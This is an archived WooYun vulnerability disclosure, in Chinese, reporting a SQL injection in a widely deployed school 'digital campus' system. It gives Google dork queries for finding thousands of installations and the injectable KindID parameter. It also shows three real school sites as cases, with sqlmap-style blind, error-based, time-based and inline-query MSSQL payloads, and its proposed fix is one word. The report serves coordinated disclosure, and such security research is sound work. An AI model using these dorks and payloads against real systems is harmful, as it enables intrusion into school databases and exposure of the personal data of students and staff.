当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065375

漏洞标题:某通用型数字校园系统SQL注射漏洞

相关厂商:cncert

漏洞作者: 路人甲

提交时间:2014-06-18 15:57

修复时间:2014-09-16 15:58

公开时间:2014-09-16 15:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-18: 细节已通知厂商并且等待厂商处理中
2014-06-23: 厂商已经确认,细节仅向厂商公开
2014-06-26: 细节向第三方安全合作伙伴开放
2014-08-17: 细节向核心白帽子及相关领域专家公开
2014-08-27: 细节向普通白帽子公开
2014-09-06: 细节向实习白帽子公开
2014-09-16: 细节向公众公开

简要描述:

0.0

详细说明:

无锡新座标教育技术有限公司 的数字化校园系统存在通用型SQL注射漏洞
装机量比较大。
谷歌关键词:intitle:校园 技术支持:无锡新座标教育技术有限公司
连接:

http://209.116.186.246/#newwindow=1&q=intitle:%E6%A0%A1%E5%9B%AD+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%97%A0%E9%94%A1%E6%96%B0%E5%BA%A7%E6%A0%87%E6%95%99%E8%82%B2%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8


近4000收录量

1.png


SQL注射点:
DPMA/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1007_1001_1002&sid=310001
谷歌关键词:inurl:DPMA/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=
连接:

http://209.116.186.246/#newwindow=1&q=inurl:DPMA%2FFWeb%2FSchoolWeb%2FWeb%2FTeacherSource.aspx%3FKindID%3D


16700个收录

2.png


案例1:
http://222.191.250.242/DPMA/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1007_1001_1002&sid=310001
---
Place: GET
Parameter: KindID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: KindID=1007_1001_1002 AND 9175=9175&sid=310001
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: KindID=1007_1001_1002 AND 4792=(SELECT COUNT(*) FROM sysusers AS sy
s1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers
AS sys6,sysusers AS sys7)&sid=310001
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server Unknown

3.png


案例2:
http://www.azxx.net/dpma/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1004_1001_0&sid=305001
---
Place: GET
Parameter: KindID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: KindID=1004_1001_0 AND 4824=4824&sid=305001
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: KindID=1004_1001_0 AND 9764=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)
+CHAR(122)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (9764=9764) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(97)+CHAR(110)+CHAR(113)))&sid=305001
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: KindID=1004_1001_0 AND 3659=(SELECT COUNT(*) FROM sysusers AS sys1,
sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS
sys6,sysusers AS sys7)&sid=305001
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: KindID=(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(111)+CHAR(113)+(S
ELECT (CASE WHEN (9316=9316) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(11
3)+CHAR(97)+CHAR(110)+CHAR(113))&sid=305001
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server Unknown


4.png


5.png

漏洞证明:

案例3:
http://szxy.ncjy.net/DPMA/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1001_1000_1650&sid=100021
---
Place: GET
Parameter: KindID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: KindID=1001_1000_1650 AND 9047=9047&sid=100021
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: KindID=1001_1000_1650 AND 2664=CONVERT(INT,(SELECT CHAR(113)+CHAR(1
02)+CHAR(106)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (2664=2664) THEN CHAR(49) EL
SE CHAR(48) END))+CHAR(113)+CHAR(109)+CHAR(120)+CHAR(101)+CHAR(113)))&sid=100021
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: KindID=1001_1000_1650 AND 7913=(SELECT COUNT(*) FROM sysusers AS sy
s1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers
AS sys6,sysusers AS sys7)&sid=100021
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: KindID=(SELECT CHAR(113)+CHAR(102)+CHAR(106)+CHAR(97)+CHAR(113)+(SE
LECT (CASE WHEN (6238=6238) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109
)+CHAR(120)+CHAR(101)+CHAR(113))&sid=100021
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server Unknown


6.png


7.png


修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-06-23 08:31

厂商回复:

cnvd确认所述情况,目前暂未能直接建立与软件生产厂商的处置协助联系渠道(通过公开渠道,无联系方式)。先行确认。

最新状态:

暂无